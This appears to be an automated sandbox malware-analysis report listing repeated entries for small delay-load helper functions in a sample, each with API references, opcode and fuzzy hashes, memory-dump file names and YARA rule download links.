                                                                                              • Opcode ID: 8cfa11f207b2acce3c0ff2b25289fc765ccdebd0b599b552fe1f7f708b89f680
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: 8cfa11f207b2acce3c0ff2b25289fc765ccdebd0b599b552fe1f7f708b89f680
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F431 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8af789bfbe56d66119bd6a9520cf4d576ded50e81abc74fa86d206af22df9bd5
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: 8af789bfbe56d66119bd6a9520cf4d576ded50e81abc74fa86d206af22df9bd5
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F409 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f0938c8312265154b6af6de82c1fe63074da0100c16f95f55d94d921b2b4541c
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: f0938c8312265154b6af6de82c1fe63074da0100c16f95f55d94d921b2b4541c
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F413 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 92d1a4f1796fe852992033c606ea8e0105d08accffce5e7c9cfdc12ce89f5e22
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: 92d1a4f1796fe852992033c606ea8e0105d08accffce5e7c9cfdc12ce89f5e22
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F41D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5676c7bf11dedec5ab35a9c7cecf0e027ba61f22f6a24d685f996b3589968837
                                                                                              • Instruction ID: 3386a97a62cf4db4557ffee4ad7e5e830c9adeefa15850bac162c77227c30322
                                                                                              • Opcode Fuzzy Hash: 5676c7bf11dedec5ab35a9c7cecf0e027ba61f22f6a24d685f996b3589968837
                                                                                              • Instruction Fuzzy Hash: 97A002955791037D355555516D17D36022CD4D4B517305D2EF851C404594501C455531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F5A0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5ad24566d0b9091af7089c5b82e9d7f0974b69f140fe4f33a5f461720bfff6bb
                                                                                              • Instruction ID: be04505ec4a36a861f57a5f539e647f7ab1a89873716bf936fa47249709df567
                                                                                              • Opcode Fuzzy Hash: 5ad24566d0b9091af7089c5b82e9d7f0974b69f140fe4f33a5f461720bfff6bb
                                                                                              • Instruction Fuzzy Hash: FAA002E6AFD102BF322867617E17E3B022CE4D8FA2B308D3EF882C5085A9955C491131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F58C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a73657bd79d20c93c6d71f417a66f8863022928582e33a1a11ff2ca05dfc4f25
                                                                                              • Instruction ID: be04505ec4a36a861f57a5f539e647f7ab1a89873716bf936fa47249709df567
                                                                                              • Opcode Fuzzy Hash: a73657bd79d20c93c6d71f417a66f8863022928582e33a1a11ff2ca05dfc4f25
                                                                                              • Instruction Fuzzy Hash: FAA002E6AFD102BF322867617E17E3B022CE4D8FA2B308D3EF882C5085A9955C491131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F596 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a9b3e02c5320f222dbb83c0cbce7b9af542320be26dcb073409c116124642b14
                                                                                              • Instruction ID: be04505ec4a36a861f57a5f539e647f7ab1a89873716bf936fa47249709df567
                                                                                              • Opcode Fuzzy Hash: a9b3e02c5320f222dbb83c0cbce7b9af542320be26dcb073409c116124642b14
                                                                                              • Instruction Fuzzy Hash: FAA002E6AFD102BF322867617E17E3B022CE4D8FA2B308D3EF882C5085A9955C491131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F564 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: af5cb6f09d9d9345ea6ff70c502e43a2375d1bbdd0ad23dd7d29aff9ac70061e
                                                                                              • Instruction ID: be04505ec4a36a861f57a5f539e647f7ab1a89873716bf936fa47249709df567
                                                                                              • Opcode Fuzzy Hash: af5cb6f09d9d9345ea6ff70c502e43a2375d1bbdd0ad23dd7d29aff9ac70061e
                                                                                              • Instruction Fuzzy Hash: FAA002E6AFD102BF322867617E17E3B022CE4D8FA2B308D3EF882C5085A9955C491131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F56E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 94877d9f5085171275c439ad2d391a8efc3c3b55e31ad4e82ce819511b5a1cda
                                                                                              • Instruction ID: be04505ec4a36a861f57a5f539e647f7ab1a89873716bf936fa47249709df567
                                                                                              • Opcode Fuzzy Hash: 94877d9f5085171275c439ad2d391a8efc3c3b55e31ad4e82ce819511b5a1cda
                                                                                              • Instruction Fuzzy Hash: FAA002E6AFD102BF322867617E17E3B022CE4D8FA2B308D3EF882C5085A9955C491131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F549 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ca50ba7814881d84ef15b507b78d5e001ceebe118bae0b7f773c7be528609a7f
                                                                                              • Instruction ID: da67928d52b00e3be4bae94595ce96d5c407301828c10cf5ce4105ec82977bca
                                                                                              • Opcode Fuzzy Hash: ca50ba7814881d84ef15b507b78d5e001ceebe118bae0b7f773c7be528609a7f
                                                                                              • Instruction Fuzzy Hash: 1AA002E6AF91057F32286B617F17E3B022DE4D4F62B30893EF881D5085A9955D491131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F6E1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 27787e1c35b3411311b4640aa2701a05d4fa3792b5badcf054bf18a8bbf6b35f
                                                                                              • Instruction ID: 24e9c83f603490eed3d3886b0ce6f778c0546d7262fe9490b4dc24a1bed06c68
                                                                                              • Opcode Fuzzy Hash: 27787e1c35b3411311b4640aa2701a05d4fa3792b5badcf054bf18a8bbf6b35f
                                                                                              • Instruction Fuzzy Hash: 20A002E6ABD142BD362872617E17E3B026CE4D8F6AB308D3FFC42D40D5A9911C492631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F6EB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 230d5bca3b0142db3eb35e38644df28c5de1afd6b7f81fd2d8ee301853add227
                                                                                              • Instruction ID: 24e9c83f603490eed3d3886b0ce6f778c0546d7262fe9490b4dc24a1bed06c68
                                                                                              • Opcode Fuzzy Hash: 230d5bca3b0142db3eb35e38644df28c5de1afd6b7f81fd2d8ee301853add227
                                                                                              • Instruction Fuzzy Hash: 20A002E6ABD142BD362872617E17E3B026CE4D8F6AB308D3FFC42D40D5A9911C492631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F6F5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 743fe52a2da364036396afd7735175f99626fbfc8a2667b50484731ca01cd81b
                                                                                              • Instruction ID: 24e9c83f603490eed3d3886b0ce6f778c0546d7262fe9490b4dc24a1bed06c68
                                                                                              • Opcode Fuzzy Hash: 743fe52a2da364036396afd7735175f99626fbfc8a2667b50484731ca01cd81b
                                                                                              • Instruction Fuzzy Hash: 20A002E6ABD142BD362872617E17E3B026CE4D8F6AB308D3FFC42D40D5A9911C492631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F6FF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
